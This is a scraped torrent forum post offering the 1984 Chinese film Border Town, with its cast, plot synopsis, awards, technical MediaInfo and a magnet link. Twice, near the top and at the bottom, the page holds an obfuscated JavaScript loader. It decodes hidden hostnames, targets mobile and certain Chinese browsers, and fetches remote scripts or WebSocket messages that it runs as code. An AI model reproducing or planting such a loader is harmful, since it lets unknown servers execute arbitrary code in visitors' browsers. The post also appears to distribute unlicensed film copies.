边城[国语配音/中文字幕].Border.Town.1984.WEB-DL.4K.H265.AAC 1.55GB

版主小s 20天前 277

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 边城 / Border Town

◎年 代 1984

◎产 地 中国大陆

◎类 别 剧情

◎语 言 汉语普通话

◎上映日期 1992-12-16(美国)

◎IMDb链接 https://www.imdb.com/title/tt0086878/

◎豆瓣评分 8.1/10 (16403人评价)

◎豆瓣链接 https://movie.douban.com/subject/1305978/

◎片 长 95分钟

◎导 演 凌子风 Zifeng Ling (id:1034622)

◎编 剧 沈从文 Congwen Shen (id:1017661)

姚云 Yun Yao (id:1362536)

李隽培 Juanpei Li (id:1357256)

◎演 员 冯汉元 Hanyuan Feng (id:1283562)

戴呐 Na Dai (id:1362537)

刘汉璞 Hanpu Liu (id:1362538)

白铭 Ming Bai (id:1362539)

刘魁 Kui Liu (id:1361159)

石磊 Lei Shi (id:1362540)

金风 Feng Jin (id:1362541)

袁思达 Sida Yuan (id:1362542)

彭铭燕 Mingyan Peng (id:1362543)

潘玫 Mei Pan (id:1362544)

罗元明 Yuanming Luo (id:1362545)

陈宗达 Zongda Chen (id:1362546)

沈从文 Congwen Shen (id:1017661)

杨汉平 Hanping Yang (id:1401963)

姚关荣 Guanrong Yao (id:1443959)

刘庄 Zhuang Liu (id:1381411)

梁子勇 Ziyong Liang (id:1367941)

刘世亮 Shiliang Liu (id:1440875)

徐晓星 Xiaoxing Xu (id:1333661)

◎标 签 边城 / 湘西 / 老片 / 名著 / 爱情 / 文学 / 小说改编 / 经典

◎简 介

本片根据沈从文同名小说改编。故事发生在民国初年,在湘西边境的一个小山城里,有一个老船夫(冯汉元 饰),守着一条渡船,帮来往的人渡河。他与外孙女翠翠(戴呐 饰)相依为命,17年前,翠翠的母亲与一名屯戍军士未婚生子,后来二人双双殉情。老船夫不想翠翠重蹈覆辙,一心希望把翠翠托付给一个可靠的人。茶峒城里的船总顺顺有两个儿子——大佬天保(刘魁 饰)和二佬傩送(石磊 饰)。他们同时爱上了翠翠,而翠翠爱的是二佬,三年前的端午节夜晚,翠翠偶然邂逅了二佬,感情的种子就在那时悄悄埋下。

后来,兄弟俩决定用唱情歌的方式,让翠翠选择。但是因为各种原因,歌声再没有传来了。随后却传来了大佬被水淹死的噩耗。二佬虽仍爱着翠翠,但因为哥哥的死,赌气出走。在一个风雨交加的夜晚,老船夫抑郁而死。翠翠终于明白了许多事情,于是,她守着渡船,等待二佬回来……

本片荣获加拿大第9届蒙特利尔国际电...

◎获奖情况 (共5项)

第5届中国电影金鸡奖 (1985)

最佳导演

└──凌子风 (id:1034622)

最佳男主角(提名)

└──冯汉元 (id:1283562)

最佳摄影(提名)

└──梁子勇 (id:1367941)

最佳美术(提名)

最佳音乐(提名)

└──刘庄 (id:1381411)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 76550045944943004013792402129733387281 (0x399700A89F145DC4E2978E15AF998411)

  4. Complete name : Border Town 1984 WEB-DL 4K H265 [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 1.55 GiB

  8. Duration : 1 h 34 min

  9. Overall bit rate : 2 342 kb/s

  10. Encoded date : UTC 2021-11-09 17:30:36

  11. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 34 min

  20. Bit rate : 2 212 kb/s

  21. Width : 3 840 pixels

  22. Height : 1 634 pixels

  23. Display aspect ratio : 2.35:1

  24. Frame rate mode : Constant

  25. Frame rate : 25.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 8 bits

  29. Bits/(Pixel*Frame) : 0.014

  30. Stream size : 1.46 GiB (94%)

  31. Default : Yes

  32. Forced : No


  33. Audio

  34. ID : 2

  35. Format : AAC LC

  36. Format/Info : Advanced Audio Codec Low Complexity

  37. Codec ID : A_AAC-2

  38. Duration : 1 h 34 min

  39. Bit rate : 128 kb/s

  40. Channel(s) : 2 channels

  41. Channel layout : L R

  42. Sampling rate : 48.0 kHz

  43. Frame rate : 46.875 FPS (1024 SPF)

  44. Compression mode : Lossy

  45. Stream size : 86.7 MiB (5%)

  46. Default : Yes

  47. Forced : No




复制代码


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:9400180B99E15E9E66D3F95B4BEA9FFECBD99853

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};